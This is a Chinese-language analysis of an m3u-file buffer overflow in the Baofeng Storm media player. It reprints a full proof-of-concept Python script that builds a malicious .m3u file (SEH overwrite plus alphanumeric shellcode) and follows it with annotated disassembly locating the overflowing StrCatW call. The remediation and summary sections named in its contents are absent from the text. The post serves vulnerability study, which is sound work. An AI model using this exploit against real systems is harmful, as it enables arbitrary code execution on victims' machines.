题目:简单分析暴风影音读取m3u格式文件漏洞
作者相关:
作者:仙果
备注:保留版权,欢迎转载,转载请注明出处。
0x1.题记
0x2.测试环境
0x3.分析过程
0x4.补救方法
0x5.总结
0x1.题记
某日惊见www.exploit-db网站上公布一则暴风影音的漏洞,是读取m3u格式文件的漏洞,
立即把POC下载回来测试之,发现对滴版本也有效,
对应版本弹出计算器,ShellCode 经过了处理,为纯字母的ShellCode,相当的劲爆啊,
因有工作的其他事情,没有当即进行分析,留到了今天把漏洞的原理进行了分析,
不敢独享,特来共享。文中难免有错漏之处,希望大家莫要在意,毕竟作者乃是半路出家,
实属不易,依然属于菜鸟一类,欢迎大家批评指正。
0x2.测试环境
2.1 windows xp sp3_cn (实体机测试,没有使用虚拟机)
2.2 Strom 2012_3.10.4.8_Cn
2.3 010editor windbg IDA5.5
0x3.分析过程
3.1 Poc代码
http://www.exploit-db.com/exploits/12516
#!/usr/bin/env python
#################################################################
#
# Title: BaoFeng Storm M3U File Processing Buffer Overflow Exploit
# CNVD-ID: CNVD-2010-00752
# Author: Lufeng Li and Qingshan Li of Neusoft Corporation
# Download: www.baofeng.com
# Test: Put m3u file in root(e.g. c:/ d:/),and open this m3u file
# Platform: Windows XPSP3 Chinese Simplified
# Vulnerable: Storm2012 3.10.4.21
# Storm2012 3.10.4.16
# Storm2012 3.10.4.8
# Storm2012 3.10.3.17
# Storm2012 3.10.2.5
# Storm2012 3.10.1.12
#################################################################
# Code :
file= "baofeng.m3u"
junk ="\x41"*795
nseh="\x61\xe8\xe1"
seh="\xaa\xd7\x40"
jmp ="\x53\x53\x6d\x58\x6d\x05\x11\x22\x6d\x2d\x10\x22\x6d\xac\xe4"
nops ="\x42" * 110
shellcode=("PPYAIAIAIAIAQATAXAZAPA3QADAZA"
"BARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA"
"58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABAB"
"AB30APB944JBKLK8U9M0M0KPS0U99UNQ8RS44KPR004K"
"22LLDKR2MD4KCBMXLOGG0JO6NQKOP1WPVLOLQQCLM2NL"
"MPGQ8OLMM197K2ZP22B7TK0RLPTK12OLM1Z04KOPBX55"
"Y0D4OZKQXP0P4KOXMHTKR8MPKQJ3ISOL19TKNTTKM18V"
"NQKONQ90***Q8OLMKQY7NXK0T5L4M33MKHOKSMND45JB"
"R84K0XMTKQHSBFTKLL0KTK28MLM18S4KKT4KKQXPSYOT"
"NDMTQKQK311IQJPQKOYPQHQOPZTKLRZKSVQM2JKQTMSU"
"89KPKPKP0PQX014K2O4GKOHU7KIPMMNJLJQXEVDU7MEM"
"KOHUOLKVCLLJSPKKIPT5LEGKQ7N33BRO1ZKP23KOYERC"
"QQ2LRCM0LJA")
fobj=open(file,"w")
payload=junk+nseh+seh+jmp+nops+shellcode
fobj.write(payload)
fobj.close()
.text:10004052 ; =============== S U B R O U T I N E =======================================
.text:10004052
.text:10004052 ; Attributes: bp-based frame
.text:10004052
.text:10004052 ; int __cdecl sub_10004052(LPCWSTR lpFileName)
.text:10004052 sub_10004052 proc near ; CODE XREF: sub_10003FCB+32p
.text:10004052
.text:10004052 Buffer = byte ptr -40Ch
.text:10004052 NumberOfBytesRead= dword ptr -0Ch
.text:10004052 var_8 = byte ptr -8
.text:10004052 var_7 = byte ptr -7
.text:10004052 var_6 = byte ptr -6
.text:10004052 var_2 = byte ptr -2
.text:10004052 var_1 = byte ptr -1
.text:10004052 lpFileName = dword ptr 8
.text:10004052
.text:10004052 push ebp
.text:10004053 mov ebp, esp
.text:10004055 sub esp, 40Ch
.text:1000405B push ebx
.text:1000405C push esi
.text:1000405D xor ebx, ebx
.text:1000405F push edi
.text:10004060 push ebx ; hTemplateFile
.text:10004061 push 80h ; dwFlagsAndAttributes
.text:10004066 push 3 ; dwCreationDisposition
.text:10004068 push ebx ; lpSecurityAttributes
.text:10004069 push 1
.text:1000406B pop esi
.text:1000406C push esi ; dwShareMode
.text:1000406D push 80000000h ; dwDesiredAccess
.text:10004072 push [ebp+lpFileName] ; lpFileName
.text:10004075 call ds:CreateFileW //打开文件
.text:1000407B mov edi, eax
.text:1000407D cmp edi, 0FFFFFFFFh
.text:10004080 jnz short loc_10004089
.text:10004082 xor eax, eax
.text:10004084 jmp loc_10004146
.text:10004089 ; ---------------------------------------------------------------------------
.text:10004089
.text:10004089 loc_10004089: ; CODE XREF: sub_10004052+2Ej
.text:10004089 lea eax, [ebp+NumberOfBytesRead]
.text:1000408C push ebx ; lpOverlapped
.text:1000408D push eax ; lpNumberOfBytesRead
.text:1000408E lea eax, [ebp+Buffer]
.text:10004094 push 400h ; nNumberOfBytesToRead
.text:10004099 push eax ; lpBuffer //读取的内容存到eax指向的内存中
.text:1000409A push edi ; hFile
.text:1000409B mov [ebp+NumberOfBytesRead], ebx
.text:1000409E call ds:ReadFile //在这里读取文件内容
.text:100040A4 test eax, eax
.text:100040A6 jz loc_1000413B
.text:100040CA mov cl, [ebp+eax+Buffer]
.text:100040D1 cmp cl, [ebp+eax+var_8]
.text:100040D5 jnz short loc_10004123
.text:100040D7 inc eax
.text:100040D8 cmp eax, 3
.text:100040DB jb short loc_100040CA
.text:100040DD xor eax, eax
.text:100040DF loc_100040DF: ; CODE XREF: sub_10004052+9Ej
.text:100040DF mov cl, [ebp+eax+Buffer] //读取文件的首字节
.text:100040E6 cmp cl, byte ptr [ebp+eax+lpFileName+2] //判断是否为UTF-8编码
.text:100040EA jnz short loc_10004123 //不是则跳往loc_10004123执行
.text:100040EC inc eax
.text:100040ED cmp eax, 2
.text:100040F0 jb short loc_100040DF
.text:100040F2 xor eax, eax
..................................................................................
.text:10004123 ; ---------------------------------------------------------------------------
.text:10004123
.text:10004123 loc_10004123: ; CODE XREF: sub_10004052+83j
.text:10004123 ; sub_10004052+98j ...
.text:10004123 xor eax, eax
.text:10004125 cmp [ebp+NumberOfBytesRead], ebx
.text:10004128 jbe short loc_1000413D
.text:1000412A
.text:1000412A loc_1000412A: ; CODE XREF: sub_10004052+E5j
.text:1000412A cmp [ebp+eax+Buffer], bl
.text:10004131 jz short loc_1000413B
.text:10004133 inc eax
.text:10004134 cmp eax, [ebp+NumberOfBytesRead]
.text:10004137 jb short loc_1000412A
.text:10004139 jmp short loc_1000413D
.text:1000413B ; ---------------------------------------------------------------------------
.text:1000413B
.text:1000413B loc_1000413B: ; CODE XREF: sub_10004052+54j
.text:1000413B ; sub_10004052+C6j ...
.text:1000413B xor esi, esi
.text:1000413D
.text:1000413D loc_1000413D: ; CODE XREF: sub_10004052+BCj
.text:1000413D ; sub_10004052+CFj ...
.text:1000413D push edi ; hObject //读取缓冲区大小eax=0x400
.text:1000413E call ds:CloseHandle //关闭文件句柄
.text:10004144 mov eax, esi
.text:10004146
.text:10004146 loc_10004146: ; CODE XREF: sub_10004052+32j
.text:10004146 pop edi
.text:10004147 pop esi
.text:10004148 pop ebx
.text:10004149 leave
.text:1000414A retn
.text:1000414A sub_10004052 endp //跳出函数
.text:10003FFC push ebx ; lpFileName
.text:10003FFD call sub_10004052 //在这里调用之前的函数
.text:10004002 test eax, eax
.text:10004004 pop ecx
.text:10004005 jnz short loc_10004018 //跳转到loc_10004018执行
.text:10004007
.text:10004007 loc_10004007: ; CODE XREF: sub_10003FCB+24j
.text:10004007 add esi, 4
.text:1000400A cmp esi, offset a_smpl ; ".smpl"
.text:10004010 jb short loc_10003FE4
.text:10004012
.text:10004012 loc_10004012: ; CODE XREF: sub_10003FCB+9j
.text:10004012 xor eax, eax
.text:10004014
.text:10004014 loc_10004014: ; CODE XREF: sub_10003FCB+50j
.text:10004014 pop edi
.text:10004015 pop esi
.text:10004016 pop ebx
.text:10004017 retn //跳出函数
.text:10004018 ; ---------------------------------------------------------------------------
.text:10004018
.text:10004018 loc_10004018: ; CODE XREF: sub_10003FCB+2Fj
.text:10004018 ; sub_10003FCB+3Aj
.text:10004018 push 1
.text:1000401A pop eax
.text:1000401B jmp short loc_10004014
.text:1000401B sub_10003FCB endp
.text:10005FC2 push ebx ; lpFileName
.text:10005FC3 mov edi, eax
.text:10005FC5 call sub_10003FCB //在此处调用sub_10003FCB函数。
.text:10005FCA test eax, eax
.text:10005FCC pop ecx
.text:10005FCD jz loc_100062B1
.text:10005FD3 mov al, byte ptr [ebp+arg_4+3]
.text:10005FD6 push esi
.text:10005FD7 push esi
.text:10005FD8 lea ecx, [ebp+pcchPath]
.text:10005FDB mov byte ptr [ebp+pcchPath], al
.text:10005FDE call sub_10002B49
.text:10005FE3 mov [ebp+var_14], eax
.text:10005FE6 mov [ebp+var_10], esi
.text:10005FE9 mov [ebp+var_4], esi
.text:10005FEC mov esi, ds:StrCmpIW
.text:10005FF2 push offset a_wax ; ".wax"
.text:10005FF7 push edi
.text:10005FF8 call esi ; StrCmpIW
.text:10005FFA test eax, eax
.text:10005FFC jz loc_100060E0
.text:10006002 push offset a_asx ; ".asx"
.text:1000604D loc_1000604D: ; CODE XREF: sub_10005F7F+BDj
.text:1000604D push offset a_m3u ; ".m3u" //找到对应的m3u
.text:10006052 push edi
.text:10006053 call esi ; StrCmpIW
.text:10006055 test eax, eax
.text:10006057 jnz short loc_10006068
.text:10006059 lea eax, [ebp+pcchPath]
.text:1000605C push eax ; int
.text:1000605D push ebx ; File
.text:1000605E call sub_1000696C //此函数把后续的内容读取到内存中,并以unicode格式存放。
.text:10006063 jmp loc_1000610A
.........................................
text:1000610A loc_1000610A: ; CODE XREF: sub_10005F7F+C9j
.text:1000610A ; sub_10005F7F+E4j ...
.text:1000610A pop ecx
.text:1000610B test eax, eax
.text:1000610D pop ecx
.text:1000610E jnz short loc_10006117
.......................
text:10006117 ; ---------------------------------------------------------------------------
.text:10006117
.text:10006117 loc_10006117: ; CODE XREF: sub_10005F7F+16Fj
.text:10006117 ; sub_10005F7F+17Fj ...
.text:10006117 mov edi, ds:StrCpyNW
.text:1000611D push 823h
.text:10006122 lea eax, [ebp+pszPath]
.text:10006128 push ebx
.text:10006129 push eax
.text:1000612A call edi ; StrCpyNW
.text:1000612C lea eax, [ebp+pszPath]
.text:10006132 xor ebx, ebx
.text:10006134 push eax ; pszPath
.text:10006135 mov [ebp+lpFileName], ebx
.text:10006138 call ds:PathIsURLW
.text:1000613E test eax, eax
.text:10006140 jz short loc_10006164
........................................
.text:10006164 ; ---------------------------------------------------------------------------
.text:10006164
.text:10006164 loc_10006164: ; CODE XREF: sub_10005F7F+1C1j
.text:10006164 lea eax, [ebp+pszPath]
.text:1000616A push eax ; pszPath
.text:1000616B call ds:PathRemoveFileSpecW
.text:10006171 lea eax, [ebp+pszPath]
.text:10006177 push eax ; pszPath
.text:10006178 call ds:PathAddBackslashW
.text:1000617E
.text:1000617E loc_1000617E: ; CODE XREF: sub_10005F7F+1E3j
.text:1000617E cmp [ebp+var_10], ebx
.text:10006181 jnz short loc_10006198
..............................
.text:10006198 ; ---------------------------------------------------------------------------
.text:10006198
.text:10006198 loc_10006198: ; CODE XREF: sub_10005F7F+202j
.text:10006198 mov eax, [ebp+var_14]
.text:1000619B mov esi, [eax]
.text:1000619D cmp esi, eax
.text:1000619F jz loc_100062A1
.text:100061A5
.text:100061A5 loc_100061A5: ; CODE XREF: sub_10005F7F+31Cj
.text:100061A5 cmp [ebp+lpFileName], ebx
.text:100061A8 jnz loc_10006259
.text:100061AE mov eax, [esi+0Ch] //[esi+0c]的地址指向UNICODE格式的填充的数据地址
.text:100061B1 cmp eax, ebx
.text:100061B3 jnz short loc_100061BA
......................................
.text:100061BA
.text:100061BA loc_100061BA: ; CODE XREF: sub_10005F7F+234j
.text:100061BA push eax ; pszPath
.text:100061BB call ds:PathIsURLW
.text:100061C1 test eax, eax
.text:100061C3 jnz short loc_100061F6
.text:100061C5 lea eax, [ebp+pszPath]
.text:100061CB push 208h
.text:100061D0 push eax
.text:100061D1 lea eax, [ebp+var_648]
.text:100061D7 push eax
.text:100061D8 call edi ; StrCpyNW
.text:100061DA mov eax, [esi+0Ch]
.text:100061DD cmp eax, ebx
.text:100061DF jnz short loc_100061E6
.............................
.text:100061E6
.text:100061E6 loc_100061E6: ; CODE XREF: sub_10005F7F+260j
.text:100061E6 push eax
.text:100061E7 lea eax, [ebp+var_648]
.text:100061ED push eax
.text:100061EE call ds:StrCatW //覆盖了函数的返回地址
.text:100061F4 jmp short loc_10006211
..................................................
.text:10006211
.text:10006211 loc_10006211: ; CODE XREF: sub_10005F7F+275j
.text:10006211 lea eax, [ebp+var_648]
.text:10006217 push eax ; pszPath
.text:10006218 lea eax, [ebp+psz]
.text:1000621E push eax ; pszBuf
.text:1000621F call ds:PathCanonicalizeW
.text:10006225 lea ecx, [ebp+var_30]
.text:10006228 call sub_10001DD7
.text:1000622D mov ecx, [ebp+arg_4]
.text:10006230 lea eax, [ebp+var_30]
.text:10006233 push eax
.text:10006234 mov byte ptr [ebp+var_4], 1
.text:10006238 call sub_10002680 //在这个函数中进行报错。
[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课